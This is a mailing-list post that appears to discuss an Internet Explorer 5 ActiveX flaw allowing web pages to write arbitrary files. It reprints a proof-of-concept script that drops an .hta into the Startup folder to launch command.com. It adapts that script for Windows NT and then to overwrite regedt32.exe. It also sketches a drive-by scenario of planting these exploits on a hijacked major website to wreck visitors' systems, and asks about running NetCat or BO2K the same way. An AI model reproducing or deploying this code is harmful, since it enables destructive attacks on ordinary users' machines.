Re: IE5 allows executing programs

[SysAdmin () SASSPRODUCTIONS COM (SysAdmin)]

Okay, I haven't seen any interesting observations yet as to the value of
this exploit or the potential damage it contains. This exploit allows for
the OVERWRITING of any application you choose, WITHOUT the system objecting.
I haven't tested it against anything specific yet, except for a trial run
against Regedit. The key is to select a specific path in which a known file
resides, such as C:\\winnt\system32 and then you give the .hta file the name
of the file you want overwritten. Here's the code originally included;

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written by Georgi Guninski
http://www.nat.bg/~joro&apos;);wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

If you wanted this to run against an NT machine then,

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> </object><script>
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start
Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>

For all those arguing about figuring out which user it should be addressed
to, the answer is to "All Users"

Now watch as I modify this to destroy Regedit 32

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> </object><script>
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</script>

As you can see the simple malicious damage is unprecedented, good luck
trying to figure out what's happened when your computers crashed,
permanently. Now let me give you a simple scenario for a real-world example.
Let's say a Cracker, we'll call him Ahab, decides to take over ABC or
Symantec's web page, not that difficult to imagine. Without ever breaking
the firewall, all he has to do is modify the web page. Now usually they
detect the obscene message within minutes taking it offline, imagine though
if Ahab just modified the source, he could include in it both Active X
exploits, for NT and 98, in addition he could add to the source an
insturction to change to another web page in 5 seconds, a page he's added to
InetPub. This new page would include the even more recent exploit that
crashes IE5 with a form field overflow. Imagine how long it would take for
anyone to realize that the web page had been hacked, their computers would
freeze everytime they went there for no apparent reason (the new exploit
doesn't display the page that froze your browser only the page before) All
of those home users, the thousands of hits a day they'd be getting, would
simply connect to the site, get their system Kernal overwritten and have
their browser crashed, forcing a restart for the home user. Does everyone
see the potential damage here?

Has anyone figure out if an arbitrary binary could be executed? Such as Net
Cat or BO2K? Also, I understand outlook executes this code immediatley, is
it possible that this same code could cause someone's system to crash merely
by opening the E-Mail?

Seth Georgion